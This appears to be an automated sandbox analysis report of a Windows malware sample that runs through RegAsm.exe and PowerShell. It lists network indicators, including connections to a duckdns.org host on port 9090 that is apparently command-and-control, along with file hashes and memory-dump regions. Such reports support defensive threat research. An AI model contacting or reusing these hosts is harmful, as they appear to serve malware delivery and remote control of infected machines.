C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 29.81.57.23.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 188.114.97.0:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 254.178.238.8.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 declareworld.com.ng udp
US 131.153.147.162:443 declareworld.com.ng tcp
US 8.8.8.8:53 162.147.153.131.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 bit9090.duckdns.org udp
RU 194.147.140.172:9090 bit9090.duckdns.org tcp
RU 194.147.140.172:9090 bit9090.duckdns.org tcp
RU 194.147.140.172:9090 bit9090.duckdns.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4dl4yuxa.5ym.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1824-9-0x000001C964840000-0x000001C964862000-memory.dmp

memory/1824-19-0x00007FFF35080000-0x00007FFF35B41000-memory.dmp

memory/1824-20-0x000001C97CCB0000-0x000001C97CCC0000-memory.dmp

memory/1196-22-0x000002A64EA90000-0x000002A64EAA0000-memory.dmp

memory/1824-21-0x000001C97CCB0000-0x000001C97CCC0000-memory.dmp

memory/1196-23-0x000002A64EA90000-0x000002A64EAA0000-memory.dmp

memory/1196-24-0x00007FFF35080000-0x00007FFF35B41000-memory.dmp

memory/1688-25-0x00007FFF35080000-0x00007FFF35B41000-memory.dmp

memory/1824-38-0x00007FFF35080000-0x00007FFF35B41000-memory.dmp

memory/1196-39-0x000002A64EA90000-0x000002A64EAA0000-memory.dmp

memory/1196-40-0x000002A64EA90000-0x000002A64EAA0000-memory.dmp

memory/1196-41-0x000002A64EA90000-0x000002A64EAA0000-memory.dmp

memory/1196-42-0x00007FFF35080000-0x00007FFF35B41000-memory.dmp

memory/1688-43-0x00007FFF35080000-0x00007FFF35B41000-memory.dmp

memory/1688-44-0x000001CBB8670000-0x000001CBB8992000-memory.dmp

memory/1688-45-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-46-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-48-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-50-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-52-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-54-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-56-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-58-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-60-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-62-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-64-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-66-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-68-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-70-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-72-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-74-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-76-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-78-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-80-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-82-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-84-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-86-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-88-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-90-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-92-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-94-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-96-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-98-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-100-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-102-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-104-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-106-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-108-0x000001CBB8670000-0x000001CBB898C000-memory.dmp

memory/1688-10515-0x000001CBB8220000-0x000001CBB8221000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5898e0a3e89b3923338156a819dcfbb4
SHA1 5f460e64f79e49aba3cce37ee725752c960eb2c4
SHA256 12605d235372a4999794df643bc8abc3ed94d4a24b808e7e1ea37c694bef35aa
SHA512 f3d7af0d06502dfae08090f4d8143c461c24f2ac0a5276fcc762c98e6d1e03fa00569214a86b96d866434341405d71d5797f313dd36c01b16dace7a73bb3c946

memory/1688-10521-0x00007FFF35080000-0x00007FFF35B41000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/1196-10524-0x00007FFF35080000-0x00007FFF35B41000-memory.dmp

memory/3324-10528-0x0000000000400000-0x00000000007E4000-memory.dmp

memory/3324-10530-0x0000000074920000-0x0000000074959000-memory.dmp

memory/3324-10538-0x0000000074CE0000-0x0000000074D19000-memory.dmp

memory/3324-10546-0x0000000000400000-0x00000000007E4000-memory.dmp

memory/3324-10547-0x0000000074CE0000-0x0000000074D19000-memory.dmp

memory/3324-10550-0x0000000074CE0000-0x0000000074D19000-memory.dmp